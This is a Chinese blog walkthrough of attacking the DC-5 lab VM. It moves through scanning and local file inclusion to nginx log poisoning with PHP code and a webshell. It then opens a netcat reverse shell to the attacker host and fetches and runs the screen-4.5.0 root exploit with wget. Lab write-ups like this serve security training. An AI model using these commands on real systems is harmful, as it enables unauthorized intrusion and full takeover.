DC-5靶机渗透


title: DC-5靶机渗透
date: 2023-2-7 10 :20 :36
tags: DC系列靶机
categories: 渗透从入门到入土
author:Abyssaler


DC-5靶机渗透全流程

一:实验环境

kali攻击机:192.168.235.130

dc-5:192.168.235.131

二:信息收集

主机发现

因为是在内网环境,所以直接用arp-scan

arp-scan -l

可以发现目标靶机的ip地址192.168.235.131

image-20230207110826659

端口扫描

先用masscan对端口进行一个快速的扫描

masscan --rate=10000 --ports 0-65535 192.168.235.131

可以发现开启了80,111,38732端口

image-20230207111302705

再用nmap对端口进行详细的扫描

nmap -sV -p80,111,38732 -A 192.168.235.131

可以发现中间件用的nginx,服务器是Linux操作系统

image-20230207111627426

访问网页

访问80端口的网页,目前没有收集到可用信息

image-20230207111921147

burp suite抓包分析

访问网页的contact栏,发现有可以交互的地方

image-20230207112712559

image-20230207112729207

思考这个地方可能会产生注入点

先抓个包看看

image-20230207113240494

通过不停的send请求,发现版本信息在变化

image-20230207113409199

image-20230207113422487

image-20230207113437098

浏览web页面,发现每次提交联系表单后,都会重定向到一个thankyou.php的页面

且版本会随着改变

image-20230207113613392

分析到这里,只发现了这个异常点,但是对渗透依然没有头绪,扫描一下目录看看

目录扫描

dirsearch -u http://192.168.235.131/ -e*

image-20230207114053190

看到有一个之前没有访问过的页面footer.php

尝试访问一下

发现就是版本信息的页面,而且随着刷新版本号还不同

image-20230207114419042

这里就可以想到,之前的thankyou.php页面是调用了现在这个footer.php来显示内容的

三:渗透测试

思路

hankyou.php页面是调用了现在这个footer.php来显示内容

形式应该为192.168.235.131/thankyou.php?file=footer.php

这里得到参数名是file还有得出是通过get传参其实是没有什么根据的,只能说根据以往的经验姑且这么试一试,发现正好可以访问

image-20230207115252316

文件包含漏洞

既然发现了文件包含,自然就想到有文件包含漏洞了

用wfuzz爆破一下路径看看

wfuzz -w /usr/share/wordlists/wfuzz/general/test.txt -w /usr/share/wordlists/wfuzz/general/lujing.txt http://192.168.235.131/thankyou.php?FUZZ=FUZZ

wfuzz的使用

https://www.freebuf.com/column/163632.html

https://blog.csdn.net/JBlock/article/details/88619117

https://www.ddosi.org/wfuzz-guide/

image-20230207152823765

尝试访问下http://192.168.235.131/thankyou.php?file=/etc/passwd

image-20230207152911262

证明有文件包含漏洞了

尝试通过日志文件来拿shell

通过日志文件查看访问网站的请求

http://192.168.235.131/thankyou.php?file=/var/log/nginx/access.log

image-20230207154725967

我们可以利用这个特点写入一段代码程序,传递到web服务器,这样这段代码程序会被写入到日志文件中

然后我们可以利用文件包含漏洞读取网站的日志文件去执行这段代码

用burp suite写入恶意代码

先上传一句phpinfo,看是否可以执行

image-20230207160449681

执行成功,同理就可以执行其他php代码

image-20230207164132677

蚁剑连接

image-20230207164241035

蚁剑上打开虚拟终端,然后反弹shell

kali上开启监听nc -lvvp 4444

image-20230207165428631

蚁剑终端输入nc 192.168.235.130 4444 -e /bin/bash

image-20230207165436305

提权

获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

查找具有SUID 标志的命令

find / -perm -4000 2>/dev/null

image-20230207165825045

搜索一下screen-4.5.0这个一看就很特殊的文件

看到有可利用的脚本

image-20230207170045898

先进入脚本的目录,把脚本复制到桌面,然后在桌面开启kali的http服务,把这个脚本下载到靶机

cp /usr/share/exploitdb/exploits/linux/local/41154.sh /root/Desktop

image-20230207170718640

kali 在当前目录下开启http 服务

python3 -m http.server 2222

在靶机中下载脚本,在靶机的tmp目录下下载,因为/tmp目录的权限大

wget http://192.168.235.130:2222/41154.sh

image-20230207171223852

给执行权限

chmod 777 41154.sh

image-20230207171339636

尝试执行,执行成功

image-20230207171444207

image-20230207171749795

查看flag

image-20230207171720758

chmod 777 41154.sh

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值